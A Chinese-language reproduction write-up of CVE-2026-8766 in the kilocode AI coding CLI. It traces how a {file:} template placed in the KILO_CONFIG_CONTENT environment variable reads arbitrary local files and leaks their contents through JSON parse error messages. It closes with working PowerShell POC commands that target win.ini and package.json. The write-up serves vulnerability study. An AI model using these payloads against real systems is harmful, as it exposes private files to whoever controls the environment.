Kilo-Org kilocode (CVE-2026-8766)

前言

参考披露的报告复现

  • 受影响产品:Kilo-Org kilocode,一个开源的 AI 代码助手 CLI 工具

  • 受影响版本:≤ 7.0.47

  • 漏洞载体:KILO_CONFIG_CONTENT 环境变量中的 {file:} 模板替换功能

  • 根本原因:不完整的修复——在从旧命名空间 OPENCODE_ 迁移到 KILO_ 时,遗留的模板替换功能未被禁用,导致控制环境变量的攻击者可读取任意本地文件

漏洞复现

环境搭建

1
2
cd kilocode-7.0.47
bun install

源码结构

kilocode 采用典型的 monorepo 结构,由多个包组成,核心 CLI 功能位于 packages/opencode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
kilocode-7.0.47/
├── .github/          # GitHub 工作流、Issue 模板、CI 配置
├── .husky/           # Git hooks 工具
├── .kilocode/        # 项目自身的默认配置模板(可能被安装到用户目录)
├── .opencode/        # 另一个配置模板目录(旧版遗留或不同应用场景)
├── .vscode/          # VSCode 工作区配置
├── .zed/             # Zed 编辑器配置
├── github/           # 与 GitHub 集成相关的辅助脚本/模块
├── nix/              # Nix 包管理器相关定义
├── packages/         # 核心代码,包含多个包(CLI、SDK 等)
├── patches/          # 对依赖的补丁文件
├── script/           # 构建、发布等辅助脚本
├── sdks/             # 多语言 SDK 源码
├── specs/            # 规范或设计文档
├── package.json      # 根包管理文件(工作区配置)
├── bun.lock          # Bun 依赖锁定文件
├── tsconfig.json     # 根 TypeScript 配置
├── turbo.json        # Turborepo 任务编排配置
└── ...               # 其他文档/许可/安装脚本

核心代码集中在 packages/ 目录下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
packages/
├── app/                  # 前端应用(Web UI)
├── containers/           # Docker 容器化部署定义
├── desktop/              # 桌面端应用(Electron/Tauri)
├── extensions/           # 编辑器扩展(VSCode 等)
├── kilo-docs/            # 文档站点
├── kilo-gateway/         # API 网关 / 代理层
├── kilo-i18n/            # 国际化翻译文件
├── kilo-telemetry/       # 遥测与数据上报模块
├── kilo-ui/              # UI 组件库
├── kilo-vscode/          # VSCode 扩展入口
├── opencode/             # 核心后端/CLI 逻辑(漏洞所在包)
├── plugin/               # 插件系统定义
├── script/               # CLI 辅助脚本
├── sdk/                  # 对外的 SDK 接口
├── storybook/            # UI 组件 Storybook 演示
├── ui/                   # 通用 UI 元素
└── util/                 # 跨包共享的工具函数

进入 opencode 目录中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
packages/opencode/
├── bin/                          # CLI 可执行入口脚本 (bun/node)
├── migration/                    # 数据库迁移文件 (SQL/TypeScript)
├── script/                       # 构建/部署/测试辅助脚本
├── src/                          # 核心源码
│   ├── config/
│   │   └── config.ts             # 配置加载、合并、parseText、load 等
│   ├── commands/                 # 子命令实现 (auth, chat, serve 等)
│   ├── providers/                # AI 模型提供商适配层
│   ├── tools/                    # 内置工具 (文件操作、搜索等)
│   ├── util/                     # 工具函数
│   └── index.ts                  # CLI 主入口,初始化命令与配置
├── test/                         # 单元测试与集成测试
├── .gitignore
├── AGENTS.md                     # AI Agent 设计文档
├── bunfig.toml                   # Bun 运行时配置
├── BUN_SHELL_MIGRATION_PLAN.md   # Shell 迁移计划文档
├── Dockerfile                    # 容器化构建文件
├── drizzle.config.ts             # Drizzle ORM 数据库配置
├── package.json                  # opencode 包依赖与脚本
├── parsers-config.ts             # 解析器配置
├── README.md
├── sst-env.d.ts                  # SST (Serverless Stack) 环境类型定义
└── tsconfig.json                 # TypeScript 编译配置

动态调试

我们用 VSCode 来完成调试,这也是最顺手的工具

在项目根目录下创建 .vscode/launch.json 文件,配置如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
{
    "version": "0.2.0",
    "configurations": [
        {
            "type": "bun",  // 如果你用 VSCode 的 Bun 插件
            "request": "launch",
            "name": "Debug Kilocode",
            "program": "${workspaceFolder}/packages/opencode/src/index.ts",
            "args": ["auth", "ls", "--print-logs"],
            "env": {
                // 在这里设置你的POC环境变量
                "KILO_CONFIG_CONTENT": "{\"a\"{file:C:\\Windows\\win.ini}\":\"x\"}"
            },
            "stopOnEntry": false,
            "cwd": "${workspaceFolder}/packages/opencode"
        }
    ]
}

按照漏洞详情及已公开的 POC,故意构造一个错误设置为环境变量

1
2
3
4
bun install
cd .\packages\opencode\
$env:KILO_CONFIG_CONTENT='{"a"{file:C:\Windows\win.ini}":"x"}'
bun --inspect-brk run src/index.ts auth ls --print-logs

运行上面命令后打开链接开始动态调式

Ctrl + P 搜索 config.ts

找到调用 load() 函数的地方

打上断点发现确实走到了这里

1
2
3
4
5
6
7
8
9
10
11
12
13
// 检查是否通过环境变量 KILO_CONFIG_CONTENT 传入了自定义配置
if (process.env.KILO_CONFIG_CONTENT) {
  // 从环境变量的内容中加载配置,并与已有配置进行合并
  result = mergeConfigConcatArrays(
    result,
    await load(process.env.KILO_CONFIG_CONTENT, {
      dir: Instance.directory,   // 指定解析相对路径时使用的目录
      source: "KILO_CONFIG_CONTENT", // 标记配置来源,便于调试或错误提示
    }),
  )
  // 记录日志,表明已从环境变量成功加载自定义配置
  log.debug("loaded custom config from KILO_CONFIG_CONTENT")
}

合并时调用了 load() 函数,进去看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
async function load(text: string, options: { path: string } | { dir: string; source: string }) {
    // 保留原始文本
    const original = text
    // 统一获取源标识:文件模式下用路径,目录模式下用 source 字段
    const source = "path" in options ? options.path : options.source
    // 判断是否为文件模式(传入 path 参数)
    const isFile = "path" in options
    // 使用 ConfigPaths 解析配置文本,支持两种模式:
    // - 文件模式:直接传入路径
    // - 目录模式:传入 { source, dir } 对象
    const data = await ConfigPaths.parseText(
      text,
      "path" in options ? options.path : { source: options.source, dir: options.dir },
    )

    // 对解析结果进行归一化处理,移除旧版 tui 相关字段
    const normalized = (() => {
      // 如果 data 为空、非对象或者是数组,直接返回
      if (!data || typeof data !== "object" || Array.isArray(data)) return data
      // 浅拷贝,避免修改原始对象
      const copy = { ...(data as Record<string, unknown>) }
      // 检查是否存在旧版 tui 字段
      const hadLegacy = "theme" in copy || "keybinds" in copy || "tui" in copy
      if (!hadLegacy) return copy
      // 移除已废弃的字段
      delete copy.theme
      delete copy.keybinds
      delete copy.tui
      // 记录警告日志,提示用户迁移配置
      log.warn("tui keys in opencode config are deprecated; move them to tui.json", { path: source })
      return copy
    })()

    // 使用 Zod 或类似库进行安全解析/校验
    const parsed = Info.safeParse(normalized)
    if (parsed.success) {
      // 如果解析成功且是文件模式,且没有 $schema 字段,则自动注入 schema 声明
      if (!parsed.data.$schema && isFile) {
        parsed.data.$schema = "https://kilo.ai/config.json" // kilocode_change: 使用 kilo.ai 的 schema
        // 在原始文本开头插入 $schema 字段,并写回文件
        const updated = original.replace(/^\s*\{/, '{\n  "$schema": "https://kilo.ai/config.json",') // kilocode_change
        await Bun.write(options.path, updated).catch(() => {})
      }
      const data = parsed.data
      // 如果存在插件列表且是文件模式,尝试解析插件路径为绝对路径
      if (data.plugin && isFile) {
        for (let i = 0; i < data.plugin.length; i++) {
          const plugin = data.plugin[i]
          try {
            // 使用 import.meta.resolve 解析插件标识符(基于当前文件路径)
            data.plugin[i] = import.meta.resolve!(plugin, options.path)
          } catch (e) {
            try {
              // import.meta.resolve 有时在新创建的 node_modules 中会失败
              // 回退到 Node.js 的 require.resolve 进行解析
              const require = createRequire(options.path)
              const resolvedPath = require.resolve(plugin)
              // 将解析后的绝对路径转换为 file:// URL
              data.plugin[i] = pathToFileURL(resolvedPath).href
            } catch {
              // 忽略无法解析的插件,可能是一个通用字符串标识符,如 "mcp-server"
            }
          }
        }
      }
      // 返回最终有效的配置数据
      return data
    }

    // 解析失败,抛出带有详细错误信息的自定义异常
    throw new InvalidError({
      path: source,
      issues: parsed.error.issues,
    })
  }

因为最后只返回 data 变量,所以我们直接给 const data 处打上断点

确实走到了这里,里面又调用了一个方法 parseText

进去看看,其中 text 是我们的值,然后又调用了 substitute 把我们的值带入了进去

打上断点后进去看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
// 定义异步函数 substitute,用于替换配置文本中的 {env:...} 和 {file:...} 模板
async function substitute(text: string, input: ParseSource, missing: "error" | "empty" = "error") {
    // 替换所有 {env:变量名} 为对应的环境变量值(不存在则为空字符串)
    text = text.replace(/\{env:([^}]+)\}/g, (_, varName) => {
        return process.env[varName] || ""
    })

    // 找出所有 {file:路径} 的匹配结果
    const fileMatches = Array.from(text.matchAll(/\{file:[^}]+\}/g))
    // 如果没有 {file:...},直接返回原文本
    if (!fileMatches.length) return text

    // 获取配置所在目录(用于解析相对路径)
    const configDir = dir(input)
    // 获取配置来源名称(用于报错信息)
    const configSource = source(input)
    // 最终输出的字符串
    let out = ""
    // 当前处理到的位置(游标)
    let cursor = 0

    // 遍历每一个 {file:...} 匹配项
    for (const match of fileMatches) {
        // 完整的匹配字符串,例如 "{file:C:\Windows\win.ini}"
        const token = match[0]
        // 该匹配在原始文本中的起始索引
        const index = match.index!
        // 将游标到该匹配之间的普通文本追加到输出中
        out += text.slice(cursor, index)

        // 找到该匹配所在行的行首位置
        const lineStart = text.lastIndexOf("\n", index - 1) + 1
        // 取出从行首到匹配开始之间的文本,并去掉开头的空白
        const prefix = text.slice(lineStart, index).trimStart()
        // 如果该行以 // 开头,说明整个 {file:...} 被注释了,不替换,保持原样
        if (prefix.startsWith("//")) {
            out += token                // 保留原标记
            cursor = index + token.length // 移动游标到标记之后
            continue                    // 跳过后续处理,继续下一个匹配
        }

        // 从标记中提取文件路径:去掉开头的 "{file:" 和结尾的 "}"
        let filePath = token.replace(/^\{file:/, "").replace(/\}$/, "")
        // 如果路径以 ~/ 开头,替换为用户主目录
        if (filePath.startsWith("~/")) {
            filePath = path.join(os.homedir(), filePath.slice(2))
        }

        // 解析为绝对路径:若已是绝对路径则直接使用,否则相对于 configDir 解析
        const resolvedPath = path.isAbsolute(filePath) ? filePath : path.resolve(configDir, filePath)
        // 读取文件内容,如果出错则根据 missing 参数决定返回空字符串或抛出异常
        const fileContent = (
            await Filesystem.readText(resolvedPath).catch((error: NodeJS.ErrnoException) => {
                if (missing === "empty") return ""   // 要求返回空字符串,则忽略错误
                // 要求抛出错误,且文件不存在时给出详细提示
                const errMsg = `bad file reference: "${token}"`
                if (error.code === "ENOENT") {
                    throw new InvalidError(
                        {
                            path: configSource,
                            message: errMsg + ` ${resolvedPath} does not exist`,
                        },
                        { cause: error },
                    )
                }
                // 其他类型的读取错误
                throw new InvalidError({ path: configSource, message: errMsg }, { cause: error })
            })
        ).trim()   // 去掉文件内容首尾的空白字符(如换行)

        // 漏洞点:将文件内容嵌入到输出中
        // JSON.stringify 会转义特殊字符,但 .slice(1,-1) 去掉了首尾双引号,
        // 导致如果文件内容包含原始换行或引号,仍会破坏外层 JSON 结构。
        out += JSON.stringify(fileContent).slice(1, -1)
        // 游标移动到当前标记的末尾
        cursor = index + token.length
    }

    // 将最后一个标记之后剩余的文本追加到输出中
    out += text.slice(cursor)
    // 返回替换完成后的整个字符串
    return out
}

慢慢打断点,在右边可以看到我们传入的值所找到的匹配结果

out += JSON 处打断点可以看到初始值就有一个 "a"

在最后的 out += text 处打断点可以看到我们已经拿到文件内容了,最后会返回

回到 parseText() 函数中打个断点查看返回的数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
export async function parseText(
  text: string,
  input: ParseSource,
  missing: "error" | "empty" = "error"
) {
  // 将配置来源对象转为可读的字符串标识(例如 "KILO_CONFIG_CONTENT" 或文件路径)
  const configSource = source(input)

  // 步骤 1:执行变量替换,将文本中的变量占位符替换为实际值
  text = await substitute(text, input, missing)

  // 准备收集 JSONC 解析过程中产生的错误
  const errors: JsoncParseError[] = []

  // 步骤 2:解析 JSONC 文本,允许尾随逗号(非标准 JSON 特性)
  const data = parseJsonc(text, errors, { allowTrailingComma: true })

  // 如果存在解析错误,构建人类可读的详细错误信息并抛出
  if (errors.length) {
    // 将文本按行分割,用于计算错误位置
    const lines = text.split("\n")

    // 将每个错误格式化为包含行号、列号和上下文信息的字符串
    const errorDetails = errors
      .map((e) => {
        // 计算错误所在行号:将文本在错误偏移量之前的部分按换行分割,数组长度即为行号
        const beforeOffset = text.substring(0, e.offset).split("\n")
        const line = beforeOffset.length
        // 计算列号:最后一行内容的长度 + 1(索引转为人类习惯的计数)
        const column = beforeOffset[beforeOffset.length - 1].length + 1
        // 获取出错的那一行原文
        const problemLine = lines[line - 1]
        // 格式化错误码及位置信息
        const error = `${printParseErrorCode(e.error)} at line ${line}, column ${column}`
        // 如果该行不存在则只返回错误位置,否则附加原文和箭头指示器
        if (!problemLine) return error
        // 构造类似 "   Line 2: { invalid }...\n          ^" 的格式,column+9 使箭头与行号对齐
        return `${error}\n   Line ${line}: ${problemLine}\n${"".padStart(column + 9)}^`
      })
      .join("\n")

    // 抛出包含完整原始文本和错误详情的 JsonError,便于开发者定位问题
    throw new JsonError({
      path: configSource,
      message: `\n--- JSONC Input ---\n${text}\n--- Errors ---\n${errorDetails}\n--- End ---`,
    })
  }

  // 解析成功,返回结果对象
  return data
}

最后文件内容传给了 problemLine,然后直接 return 返回了

利用链

1
2
3
4
5
6
7
8
# 1. 回到正确的执行目录
cd C:\test\kilocode-7.0.47\packages\opencode

# 2. 设置环境变量:模板在键名中,目标文件为项目自身的 package.json(双引号丰富,必破坏语法)
$env:KILO_CONFIG_CONTENT='{"{file:C:\test\kilocode-7.0.47\package.json}":"value"}'

# 3. 执行命令触发配置加载
bun run src/index.ts auth ls --print-logs

POC

1
2
$env:KILO_CONFIG_CONTENT='{"a"{file:C:\Windows\win.ini}":"x"}'
bun run src/index.ts auth ls --print-logs